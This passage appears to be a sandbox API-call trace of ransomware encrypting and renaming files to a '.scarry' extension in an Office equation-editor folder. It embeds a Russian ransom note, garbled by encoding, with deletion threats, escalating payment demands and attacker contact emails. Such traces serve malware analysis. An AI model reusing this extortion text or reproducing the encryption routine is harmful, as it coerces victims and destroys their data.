CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ní\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txtXT\x18\x03") returned 36 [0108.376] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP", cchWideChar=68, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLPñ", lpUsedDefaultChar=0x0) returned 68 [0108.376] CharLowerBuffW (in: lpsz=".HLP", cchLength=0x4 | out: lpsz=".hlp") returned 0x4 [0108.376] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".hlp", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".hlpShared\\EQUATION\\EQNEDT32.HLPñ", lpUsedDefaultChar=0x0) returned 4 [0108.376] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP", lpFindFileData=0x18eb04 | out: lpFindFileData=0x18eb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bd0200, ftCreationTime.dwHighDateTime=0x1be1298, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3bd0200, ftLastWriteTime.dwHighDateTime=0x1be1298, nFileSizeHigh=0x0, nFileSizeLow=0x2b0b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.HLP", cAlternateFileName="")) returned 0x58b060 [0108.376] FileTimeToLocalFileTime (in: lpFileTime=0x18eb18, lpLocalFileTime=0x18ea30 | out: lpLocalFileTime=0x18ea30) returned 1 [0108.376] FileTimeToDosDateTime (in: lpFileTime=0x18ea30, lpFatDate=0x18eae6, lpFatTime=0x18eae4 | out: lpFatDate=0x18eae6, lpFatTime=0x18eae4) returned 1 [0108.376] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0108.377] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP", dwFileAttributes=0x20) returned 1 [0108.377] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0108.377] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0108.377] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x2b0b7 [0108.378] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0108.378] ReadFile (in: hFile=0x1a4, lpBuffer=0x1e79f08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08*, lpNumberOfBytesRead=0x18ea34*=0x4000, lpOverlapped=0x0) returned 1 [0108.526] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.526] GlobalLock (hMem=0x450004) returned 0x597998 [0108.527] GlobalHandle (pMem=0x597998) returned 0x450004 [0108.527] GlobalUnlock (hMem=0x450004) returned 0 [0108.527] GlobalReAlloc (hMem=0x450004, dwBytes=0x4000, uFlags=0x2) returned 0x450004 [0108.527] GlobalLock (hMem=0x450004) returned 0x5999a8 [0108.528] GlobalHandle (pMem=0x5999a8) returned 0x450004 [0108.528] GlobalUnlock (hMem=0x450004) returned 0 [0108.528] GlobalReAlloc (hMem=0x450004, dwBytes=0x6000, uFlags=0x2) returned 0x450004 [0108.528] GlobalLock (hMem=0x450004) returned 0x59d9b8 [0108.528] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.528] GlobalUnlock (hMem=0x45000c) returned 0 [0108.528] GlobalHandle (pMem=0x59d9b8) returned 0x450004 [0108.528] GlobalUnlock (hMem=0x450004) returned 0 [0108.528] GlobalLock (hMem=0x450004) returned 0x591988 [0108.528] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.528] GlobalUnlock (hMem=0x450004) returned 0 [0108.528] GlobalReAlloc (hMem=0x450004, dwBytes=0x6000, uFlags=0x2) returned 0x450004 [0108.528] GlobalLock (hMem=0x450004) returned 0x591988 [0108.528] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.529] GlobalUnlock (hMem=0x450004) returned 0 [0108.529] ReadFile (in: hFile=0x1a4, lpBuffer=0x1e4d2c0, nNumberOfBytesToRead=0x18, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e4d2c0*, lpNumberOfBytesRead=0x18ea34*=0x18, lpOverlapped=0x0) returned 1 [0108.530] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea28*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea28*=0) returned 0x0 [0108.530] WriteFile (in: hFile=0x1a4, lpBuffer=0x1e79f08*, nNumberOfBytesToWrite=0x4018, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08*, lpNumberOfBytesWritten=0x18ea30*=0x4018, lpOverlapped=0x0) returned 1 [0108.530] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=176311, lpDistanceToMoveHigh=0x18ea28*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea28*=0) returned 0x2b0b7 [0108.530] WriteFile (in: hFile=0x1a4, lpBuffer=0x1e4d2c0*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1e4d2c0*, lpNumberOfBytesWritten=0x18ea30*=0x18, lpOverlapped=0x0) returned 1 [0108.530] WriteFile (in: hFile=0x1a4, lpBuffer=0x18eaac*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x18eaac*, lpNumberOfBytesWritten=0x18ea30*=0x8, lpOverlapped=0x0) returned 1 [0108.530] WriteFile (in: hFile=0x1a4, lpBuffer=0x1ea1d48*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1ea1d48*, lpNumberOfBytesWritten=0x18ea30*=0x1, lpOverlapped=0x0) returned 1 [0108.685] WriteFile (in: hFile=0x1a4, lpBuffer=0x1e79f28*, nNumberOfBytesToWrite=0x9c, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1e79f28*, lpNumberOfBytesWritten=0x18ea30*=0x9c, lpOverlapped=0x0) returned 1 [0108.685] CloseHandle (hObject=0x1a4) returned 1 [0108.725] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e7e018, cbMultiByte=39, lpWideCharStr=0x18da40, cchWideChar=2047 | out: lpWideCharStr="n9CDsSozE+uvBcVYS53KG0M5M9esrutb.scarry=GSpuRTe9BYpCgPmO.scarry") returned 39 [0108.725] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\n9CDsSozE+uvBcVYS53KG0M5M9esrutb.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\n9cdssoze+uvbcvys53kg0m5m9esrutb.scarry")) returned 1 [0108.726] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\n9CDsSozE+uvBcVYS53KG0M5M9esrutb.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\n9cdssoze+uvbcvys53kg0m5m9esrutb.scarry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0108.726] SetFileTime (hFile=0x1a4, lpCreationTime=0x18ead0, lpLastAccessTime=0x18eac8, lpLastWriteTime=0x18eac0) returned 1 [0108.726] CloseHandle (hObject=0x1a4) returned 1 [0108.726] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\n9CDsSozE+uvBcVYS53KG0M5M9esrutb.scarry", dwFileAttributes=0x20) returned 1 [0108.727] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ab98, cbMultiByte=36, lpWideCharStr=0x18dd68, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT\x18\x03") returned 36 [0108.727] GlobalLock (hMem=0x450004) returned 0x591988 [0108.727] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.727] GlobalUnlock (hMem=0x450004) returned 0 [0108.727] GlobalLock (hMem=0x450004) returned 0x591988 [0108.727] GlobalLock (hMem=0x45000c) returned 0x593998 [0108.727] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.727] GlobalUnlock (hMem=0x450004) returned 0 [0108.727] GlobalHandle (pMem=0x593998) returned 0x45000c [0108.727] GlobalUnlock (hMem=0x45000c) returned 0 [0108.727] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}\r\n\r\nÂàøè äîêóìåíòû, ôîòîãðàôèè, áàçû äàííûõ è äðóãèå âàæíûå ôàéëû áûëè çàøèôðîâàíû. \r\nÊàæäûå 24 ÷àñà óäàëÿþòñÿ 24 ôàéëà, íåîáõîäèìî ïðèñëàòü ñâîé èäåíòèôèêàòîð ÷òîá ìû îòêëþ÷èëè ýòó ôóíêöèþ.\r\nÊàæäûå 24 ÷àñà ñòîèìîñòü ðàñøèôðîâêè äàííûõ óâåëè÷èâàåòñÿ íà 30% (÷åðåç 72 ÷àñà ñóììà ôèêñèðóåòñÿ)\r\n\r\nÄëÿ ðàñøèôðîâêè äàííûõ:\r\n\r\nÍàïèøèòå íà ïî÷òó - scarry38@horsefucker.org\r\n \r\n * ïèñüìå óêàçàòü Âàø ëè÷íûé èäåíòèôèêàòîð\r\n *Ïðèêðåïèòå 2 ôàéëà äî 1 ìá äëÿ òåñòîâîé ðàñøèôðîâêè. \r\n ìû èõ ðàñøèôðóåì, â êà÷åñòâå äîêàçàòåëüñòâà, ÷òî ÒÎËÜÊÎ ÌÛ ìîæåì ðàñøèôðîâàòü ôàéëû.\r\n\r\nÂÀÆÍÎ! Íå ïèøèòå ñ mail.ru (ê íàì íå äîõîäÿò ïèüñìà) Èñïîëüçóéòå - yandex.ru gmail.com è ò.ä. \r\nÂñå êðîìå mail.ru\r\n\r\n -×åì áûñòðåå âû ñîîáùèòå íàì ñâîé èäåíòèôèêàòîð, òåì áûñòðåå ìû âûêëþ÷èì ïðîèçâîëüíîå óäàëåíèå ôàéëîâ.\r\n -Íàïèñàâ íàì íà ïî÷òó âû ïîëó÷èòå äàëüíåéøèå èíñòðóêöèè ïî îïëàòå.\r\n\r\n îòâåòíîì ïèñüìå Âû ïîëó÷èòå ïðîãðàììó äëÿ ðàñøèôðîâêè.\r\nÏîñëå çàïóñêà ïðîãðàììû-äåøèôðîâùèêà âñå Âàøè ôàéëû áóäóò âîññòàíîâëåíû.\r\n\r\nÌû ãàðàíòèðóåì:\r\n100% óñïåøíîå âîññòàíîâëåíèå âñåõ âàøèõ ôàéëîâ\r\n100% ãàðàíòèþ ñîîòâåòñòâèÿ\r\n100% áåçîïàñíûé è íàäåæíûé ñåðâèñ\r\n\r\nÂíèìàíèå!\r\n * Íå ïûòàéòåñü óäàëèòü ïðîãðàììó èëè çàïóñêàòü àíòèâèðóñíûå ñðåäñòâà\r\n * Ïîïûòêè ñàìîñòîÿòåëüíîé ðàñøèôðîâêè ôàéëîâ ïðèâåäóò ê ïîòåðå Âàøèõ äàííûõ\r\n * Äåøèôðàòîðû äðóãèõ ïîëüçîâàòåëåé íåñîâìåñòèìû ñ Âàøèìè äàííûìè, òàê êàê ó êàæäîãî ïîëüçîâàòåëÿ\r\nóíèêàëüíûé êëþ÷ øèôðîâàíèÿ\r\n\r\n Åñëè âàì íå îòâåòèëè â òå÷åíèè 24õ ÷àñîâ, ïèøèòå íà ðåçåðâíóþ ïî÷òó - black8201@protonmail.com\r\n====================================================================================================\r\n\r\nÂàø ëè÷íûé èäåíòèôèêàòîð\r\n\r\n{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0108.727] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0108.728] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", lpFindFileData=0x18eb1c | out: lpFindFileData=0x18eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd8d32a0, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xfd8d32a0, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfd8d32a0, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0xdf9, dwReserved0=0xe80020c8, dwReserved1=0x402, cFileName="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", cAlternateFileName="D407~1.TXT")) returned 0x58b060 [0108.728] FileTimeToLocalFileTime (in: lpFileTime=0x18eb30, lpLocalFileTime=0x18eab0 | out: lpLocalFileTime=0x18eab0) returned 1 [0108.728] FileTimeToDosDateTime (in: lpFileTime=0x18eab0, lpFatDate=0x18eafe, lpFatTime=0x18eafc | out: lpFatDate=0x18eafe, lpFatTime=0x18eafc) returned 1 [0108.728] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0108.728] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0108.728] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.728] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0xdf9 [0108.728] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.728] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.728] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0xdf9 [0108.728] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.728] ReadFile (in: hFile=0x1a4, lpBuffer=0x1e7ad38, nNumberOfBytesToRead=0xdf9, lpNumberOfBytesRead=0x18ed28, lpOverlapped=0x0 | out: lpBuffer=0x1e7ad38*, lpNumberOfBytesRead=0x18ed28*=0xdf9, lpOverlapped=0x0) returned 1 [0108.728] CloseHandle (hObject=0x1a4) returned 1 [0108.729] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fd7600, ftCreationTime.dwHighDateTime=0x1bc9dc7, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x95fd7600, ftLastWriteTime.dwHighDateTime=0x1bc9dc7, nFileSizeHigh=0x0, nFileSizeLow=0x1de8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MTEXTRA.TTF", cAlternateFileName="")) returned 1 [0108.729] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0108.729] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0108.729] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.729] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.729] GlobalUnlock (hMem=0x45000c) returned 0 [0108.729] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.729] GlobalLock (hMem=0x450004) returned 0x593998 [0108.729] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.729] GlobalUnlock (hMem=0x45000c) returned 0 [0108.729] GlobalHandle (pMem=0x593998) returned 0x450004 [0108.729] GlobalUnlock (hMem=0x450004) returned 0 [0108.729] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0108.730] CharLowerBuffW (in: lpsz="MTEXTRA.TTF", cchLength=0xb | out: lpsz="mtextra.ttf") returned 0xb [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.730] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ace8, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txtXT\x18\x03") returned 36 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", cchWideChar=67, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", lpUsedDefaultChar=0x0) returned 67 [0108.730] CharLowerBuffW (in: lpsz=".TTF", cchLength=0x4 | out: lpsz=".ttf") returned 0x4 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".ttf", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ttfShared\\EQUATION\\MTEXTRA.TTF", lpUsedDefaultChar=0x0) returned 4 [0108.731] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", lpFindFileData=0x18eb04 | out: lpFindFileData=0x18eb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fd7600, ftCreationTime.dwHighDateTime=0x1bc9dc7, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x95fd7600, ftLastWriteTime.dwHighDateTime=0x1bc9dc7, nFileSizeHigh=0x0, nFileSizeLow=0x1de8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MTEXTRA.TTF", cAlternateFileName="")) returned 0x58b060 [0108.731] FileTimeToLocalFileTime (in: lpFileTime=0x18eb18, lpLocalFileTime=0x18ea30 | out: lpLocalFileTime=0x18ea30) returned 1 [0108.731] FileTimeToDosDateTime (in: lpFileTime=0x18ea30, lpFatDate=0x18eae6, lpFatTime=0x18eae4 | out: lpFatDate=0x18eae6, lpFatTime=0x18eae4) returned 1 [0108.731] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0108.731] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", dwFileAttributes=0x20) returned 1 [0108.731] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0108.731] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0108.732] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x1de8 [0108.732] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0108.732] ReadFile (in: hFile=0x1a4, lpBuffer=0x1e79f08, nNumberOfBytesToRead=0x1de8, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08*, lpNumberOfBytesRead=0x18ea34*=0x1de8, lpOverlapped=0x0) returned 1 [0108.734] GlobalLock (hMem=0x450004) returned 0x591988 [0108.734] GlobalLock (hMem=0x45000c) returned 0x593998 [0108.734] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.734] GlobalUnlock (hMem=0x450004) returned 0 [0108.734] GlobalHandle (pMem=0x593998) returned 0x45000c [0108.734] GlobalUnlock (hMem=0x45000c) returned 0 [0108.734] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.734] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.734] GlobalUnlock (hMem=0x45000c) returned 0 [0108.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e7be18, cbMultiByte=37, lpWideCharStr=0x18da40, cchWideChar=2047 | out: lpWideCharStr="AzQX0q5p4V3C2CA2Q4gBgngW2woDnQ.scarryry=GSpuRTe9BYpCgPmO.scarry") returned 37 [0108.990] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\AzQX0q5p4V3C2CA2Q4gBgngW2woDnQ.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\azqx0q5p4v3c2ca2q4gbgngw2wodnq.scarry")) returned 1 [0108.991] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\AzQX0q5p4V3C2CA2Q4gBgngW2woDnQ.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\azqx0q5p4v3c2ca2q4gbgngw2wodnq.scarry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0108.991] SetFileTime (hFile=0x1a4, lpCreationTime=0x18ead0, lpLastAccessTime=0x18eac8, lpLastWriteTime=0x18eac0) returned 1 [0108.991] CloseHandle (hObject=0x1a4) returned 1 [0108.992] SetFileAttributesW 